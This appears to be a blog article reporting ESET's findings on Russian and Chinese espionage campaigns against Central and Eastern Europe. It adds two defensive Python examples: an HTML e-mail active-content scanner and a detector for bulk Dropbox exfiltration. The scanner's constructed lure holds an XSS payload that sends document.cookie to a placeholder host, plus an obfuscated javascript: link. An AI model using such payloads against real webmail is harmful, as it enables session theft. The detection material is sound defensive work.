Monday, January 19, 2026

Russian Cyberspies Intensify Attacks: Inside the Operations Targeting Central and Eastern Europe


In recent months, cybersecurity analysts at ESET have observed a significant increase in cyberespionage activity originating from Russian APT (Advanced Persistent Threat) groups. The primary targets have been government and defense institutions, as well as companies in the technology and transport sectors. This article reveals the inner workings of these cyberattacks, offering detailed examples and operational breakdowns.

The Digital Face of Warfare

ESET researchers have published a report summarizing APT activity between October 2024 and March 2025. Chinese-linked groups remained the most active (40.1% of observed activity), followed by Russian groups (25.7%). North Korean (14.4%) and Iranian (9.1%) actors also played significant roles.

APT groups are typically state-sponsored or state-directed actors, operating either within an intelligence service or on its behalf. They specialize in long-term, targeted cyber operations aimed at infiltrating high-value systems, most often those of government bodies, defense organizations or major corporations. Their goal is to remain undetected for as long as possible while collecting sensitive data. With access to advanced tooling, deep technical expertise and substantial funding, these groups conduct highly sophisticated campaigns.

One of the most aggressive China-linked actors, Mustang Panda, continues to launch persistent attacks on European entities—especially those in maritime transport and government sectors. Its recent targets include Poland, the UK, and Norway.

“Across Europe, government institutions remain the primary targets of APT cyberespionage, whereas in other regions, technology firms bear the brunt,” notes Kamil Sadkowski, malware analyst at ESET. “In Europe, the defense sector ranks fourth in targeted sectors, whereas globally, it does not make the top five. Ukraine has been hit hardest, mainly due to relentless campaigns by Russian-linked groups targeting critical infrastructure and government institutions.”

Russian Cyberspies and the Long-Term Campaign

One of the most notable operations during this period is RoundPress, a campaign attributed to the Russian APT group Sednit (also known as APT28 or Fancy Bear). This campaign began in 2023 and intensified throughout 2024, primarily targeting government and defense institutions in Central and Eastern Europe.

Notably, RoundPress appears to be focused on entities involved in supplying weapons to Ukraine—a clear indication of its strategic intent. According to ESET analysts, the operation is likely connected to Russia’s military intelligence agency, GRU.

“Sednit has been active since at least 2004 and is believed to have ties to the GRU. It was one of the groups behind the breach of the Democratic National Committee ahead of the 2016 U.S. presidential election. It’s also linked to the TV5Monde attack and the leak of WADA (World Anti-Doping Agency) emails,” Sadkowski adds.

“The scale and coordination of RoundPress indicate a high level of state backing. Among its targets were defense contractors and state agencies, likely in search of intelligence on military aid to Ukraine and diplomatic initiatives.”

The Phishing Trap

Most attacks begin with a phishing email. These messages often appear harmless, disguised as news updates about current events.

For example, in September 2024, Sednit sent out a phishing email from kyivinfo24@ukr[.]net with the subject line:
“SBU detains banker accused of spying in Kharkiv.”

The email mimicked a newsletter and included links to genuine articles from Kyiv Post, a well-known Ukrainian newspaper. The HTML body also carried hidden JavaScript that executed as soon as the message was opened in the target's webmail client, exploiting a cross-site scripting flaw in the webmail software: the script ran in the victim's authenticated mailbox session and silently gave the attackers access to the victim's email data.
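The mechanism above, an HTML lure whose visible content is a harmless news digest while an attribute carries the payload, is something a mail gateway or SOC can triage before the message reaches a vulnerable webmail client. The following is an added example, not code from ESET or from the original article: it parses raw MIME messages, flags active content in any text/html part, and shows the same markup neutralised. The sender, links and hostnames in the two sample messages are constructed placeholders, not RoundPress indicators.

```python
"""Flag HTML e-mail bodies that carry active content: script tags, event-handler
attributes, javascript: URIs, embedded frames.  A webmail client that renders such
markup unsanitised runs the attacker's JavaScript inside the victim's mailbox
session, which is the mechanism the lure described above relies on.

Added example, not code from ESET or from the article; the two messages below are
constructed for illustration (sender, links and hostnames are placeholders)."""
import email
import re
from email import policy
from html import unescape

# Heuristic indicators of active content. A production mail gateway should pair
# this with an allowlist-based HTML sanitiser; regexes alone are a triage signal.
ACTIVE_CONTENT = {
    "script_tag":     re.compile(r"<\s*script\b", re.I),
    "event_handler":  re.compile(r"<[^>]+\son[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"(?:href|src|action|xlink:href)\s*=\s*['\"]?\s*javascript:", re.I),
    "embedded_frame": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}

_ATTR_VALUE = re.compile(r"""=\s*(["'])(.*?)\1""", re.S)

def _unescape_attr_values(html: str) -> str:
    """Browsers decode entities inside attribute values before interpreting them,
    so href="javas&#99;ript:..." is live.  Decode only there, so that text such as
    &lt;script&gt; displayed in a message body is not mistaken for a real tag."""
    return _ATTR_VALUE.sub(lambda m: "=" + m.group(1) + unescape(m.group(2)) + m.group(1), html)

def scan_html(html: str) -> list[str]:
    """Return the indicator names present in one HTML body, in dictionary order."""
    decoded = _unescape_attr_values(html)
    return [name for name, pat in ACTIVE_CONTENT.items() if pat.search(decoded)]

def scan_message(raw: bytes) -> list[str]:
    """Parse a raw RFC 5322 message and scan every text/html MIME part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits: list[str] = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            for name in scan_html(part.get_content()):
                if name not in hits:
                    hits.append(name)
    return hits

def strip_active_content(html: str) -> str:
    """Neutralise the indicators above.  Keeps the visible newsletter intact while
    removing what would execute; a demonstration, not a complete sanitiser."""
    html = _unescape_attr_values(html)
    html = re.sub(r"<\s*script\b.*?<\s*/\s*script\s*>", "", html, flags=re.I | re.S)
    html = re.sub(r"<\s*(?:iframe|object|embed)\b[^>]*>", "", html, flags=re.I)
    html = re.sub(r"""\son[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)""", "", html, flags=re.I)
    html = re.sub(r"""((?:href|src|action)\s*=\s*['"]?)\s*javascript:[^'">\s]*""",
                  r"\1about:blank", html, flags=re.I)
    return html

# Constructed lure in the style described above: a news digest whose visible
# content is harmless while two attributes carry the payload.
LURE_EML = "\r\n".join([
    "From: newsletter@example.invalid",
    "To: victim@example.invalid",
    "Subject: SBU detains banker accused of spying in Kharkiv",
    "MIME-Version: 1.0",
    'Content-Type: text/html; charset="utf-8"',
    "",
    "<html><body>",
    "<h1>SBU detains banker accused of spying in Kharkiv</h1>",
    '<p>Full story: <a href="https://news.example.invalid/article/1">news.example.invalid</a></p>',
    '<img src="x" onerror="fetch(\'https://c2.example.invalid/?c=\'+document.cookie)">',
    '<a href="javas&#99;ript:void(0)">Unsubscribe</a>',
    "</body></html>",
]).encode()

# Constructed benign newsletter with the same layout and no active content.
BENIGN_EML = "\r\n".join([
    "From: newsletter@example.invalid",
    "To: victim@example.invalid",
    "Subject: Weekly digest",
    "MIME-Version: 1.0",
    'Content-Type: text/html; charset="utf-8"',
    "",
    "<html><body><h1>Weekly digest</h1>",
    '<p>Full story: <a href="https://news.example.invalid/article/2">news.example.invalid</a></p>',
    "</body></html>",
]).encode()

if __name__ == "__main__":
    print("lure   :", scan_message(LURE_EML))    # ['event_handler', 'javascript_uri']
    print("benign :", scan_message(BENIGN_EML))  # []
```

The entity-decoding step matters: a webmail client decodes `&#99;` inside an attribute before interpreting the URI, so a detector that only looks for the literal string `javascript:` misses the second payload. The regexes are a triage signal; the durable fix is an allowlist-based sanitiser in the client that renders the mail.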

In another case, targets in Bulgaria received a phishing email in November 2024, sent from a compromised account. The subject claimed that President-elect Donald Trump had accepted Russian terms regarding the war. It appeared to link to content from the Bulgarian news site News.bg.

“These campaigns are adapted for regional targets across Central and Eastern Europe, reflecting GRU’s geographic priorities,” says Sadkowski.

Exploiting System Vulnerabilities

Later in 2024, ESET identified campaigns carried out by the RomCom APT group that chained two previously unpatched (zero-day) vulnerabilities, one in Mozilla Firefox and one in Microsoft Windows. Active since at least 2022, RomCom is known for attacks on Ukrainian governmental and security institutions.

The chain let the attackers escape the browser sandbox, elevate their privileges and install the group's backdoor with no interaction beyond the victim visiting a malicious web page. According to ESET telemetry, the campaign targeted up to 250 systems, suggesting a wide-scale operation.

Gamaredon – Russia’s Most Aggressive APT

Gamaredon remains one of Russia's most active and aggressive APT groups. In late 2024 its tooling became more sophisticated, adopting new code obfuscation techniques, including decoy command-and-control server addresses planted in the malware to complicate analysis and misdirect defenders.

October 2024 saw a record number of unique malware samples linked to Gamaredon. In November, the group introduced a new tool: PteroBox, malware designed to exfiltrate Office files, PDFs, images, and databases to Dropbox.
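Exfiltration to a legitimate cloud service means the network sees ordinary HTTPS to Dropbox rather than a suspicious domain, so the useful signal is the cadence and volume of uploads from a host that normally sends little there. The following added example is not ESET's detection logic or anything from the original article: it reads web-proxy log lines in a constructed space-separated format (timestamp, source IP, method, host, path, status, bytes sent), applies a sliding window per source host, and flags hosts that exceed an upload-count or byte threshold. The thresholds are assumptions to tune against your own baseline.

```python
"""Spot bulk uploads to Dropbox's content API in web-proxy logs.  PteroBox, as
described above, stages stolen documents to Dropbox, so what the network sees is
ordinary HTTPS to a legitimate service; the signal is cadence and volume from a
host that normally sends little there.

Added example, not ESET's detection logic.  The log format (space-separated:
timestamp src_ip method host path status bytes_out) and every sample line are
constructed; the thresholds are assumptions to tune against your own baseline."""
from collections import defaultdict
from datetime import datetime, timedelta

# content.dropboxapi.com is the real Dropbox endpoint for file bodies; metadata
# calls (list_folder etc.) go to api.dropboxapi.com and are ignored here.
DROPBOX_UPLOAD_HOSTS = {"content.dropboxapi.com"}
UPLOAD_PATH_PREFIXES = ("/2/files/upload", "/2/files/upload_session/")
WINDOW = timedelta(minutes=10)
MAX_UPLOADS_PER_WINDOW = 5              # assumption: >5 uploads in 10 min is unusual
MAX_BYTES_PER_WINDOW = 2 * 1024 * 1024  # assumption: >2 MiB in 10 min is unusual

# Constructed sample: 10.1.4.22 drips eight documents out in three minutes,
# 10.1.7.9 is a user syncing two files an hour apart, 10.1.9.3 pushes one large
# file through an upload session.
SAMPLE_LOG = """\
2024-11-12T09:00:00Z 10.1.4.22 POST api.dropboxapi.com /2/files/list_folder 200 120
2024-11-12T09:00:01Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 48211
2024-11-12T09:00:03Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 91044
2024-11-12T09:00:04Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 130772
2024-11-12T09:00:09Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 77310
2024-11-12T09:00:15Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 22004
2024-11-12T09:00:21Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 64590
2024-11-12T09:01:02Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 118233
2024-11-12T09:02:47Z 10.1.4.22 POST content.dropboxapi.com /2/files/upload 200 201906
2024-11-12T09:05:10Z 10.1.7.9 POST content.dropboxapi.com /2/files/upload 200 310200
2024-11-12T09:12:00Z 10.1.9.3 POST content.dropboxapi.com /2/files/upload_session/append_v2 200 3200000
2024-11-12T09:13:30Z 10.1.9.3 GET www.dropbox.com /home 200 0
2024-11-12T09:40:33Z 10.1.7.9 POST content.dropboxapi.com /2/files/upload 200 150000
"""

def parse_log(text: str):
    """Yield (time, src_ip, bytes_out) for requests that carry file content up."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, host, path, _status, size = line.split()
        if method != "POST" or host not in DROPBOX_UPLOAD_HOSTS:
            continue
        if not path.startswith(UPLOAD_PATH_PREFIXES):
            continue
        yield datetime.fromisoformat(ts.replace("Z", "+00:00")), src, int(size)

def find_bulk_uploaders(text: str) -> dict[str, dict]:
    """For each source IP, slide a WINDOW over its time-sorted uploads and report
    the densest window that exceeds either threshold."""
    events = defaultdict(list)
    for ts, src, size in parse_log(text):
        events[src].append((ts, size))
    flagged: dict[str, dict] = {}
    for src, evs in events.items():
        evs.sort()
        start, total = 0, 0
        for end, (ts, size) in enumerate(evs):
            total += size
            while evs[start][0] < ts - WINDOW:   # drop events older than the window
                total -= evs[start][1]
                start += 1
            count = end - start + 1
            if count > MAX_UPLOADS_PER_WINDOW or total > MAX_BYTES_PER_WINDOW:
                prev = flagged.get(src)
                if prev is None or total > prev["bytes"]:
                    flagged[src] = {"uploads": count, "bytes": total,
                                    "window_end": ts.isoformat()}
    return flagged

if __name__ == "__main__":
    for src, info in find_bulk_uploaders(SAMPLE_LOG).items():
        print(src, info)
```

Dropbox traffic on its own is not an indicator; the host 10.1.7.9 in the sample is never flagged. What stands out is many small uploads in quick succession (the document drip from 10.1.4.22) or one large upload session, and both should be compared against which hosts actually have a sanctioned Dropbox use before anyone is paged.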

“Gamaredon is not only aggressive but also consistently evolving,” notes Sadkowski.
“Its use of advanced evasion methods is a reminder that defending sensitive data and infrastructure requires constant vigilance—especially in strategic sectors.”

China’s Mustang Panda Targets Europe

Meanwhile, Mustang Panda—the most active Chinese-linked APT group operating in Europe—continues its focus on maritime transport and government bodies. Its recent targets again include Poland, the United Kingdom, and Norway.

Final Thoughts

The escalation of cyberespionage activity from Russian and Chinese APTs underscores the geopolitical dimensions of digital warfare. These operations are not random acts of cybercrime but are carefully coordinated campaigns aligned with strategic state objectives—whether it’s undermining Ukrainian defense, stealing diplomatic intelligence, or sabotaging infrastructure.

As the digital battleground continues to expand, particularly in Central and Eastern Europe, defending against APT threats will require not only technical resilience but also international cooperation and intelligence sharing.

Source: ESET APT Activity Report Q4 2024 – Q1 2025
Original publication: CEO.com.pl
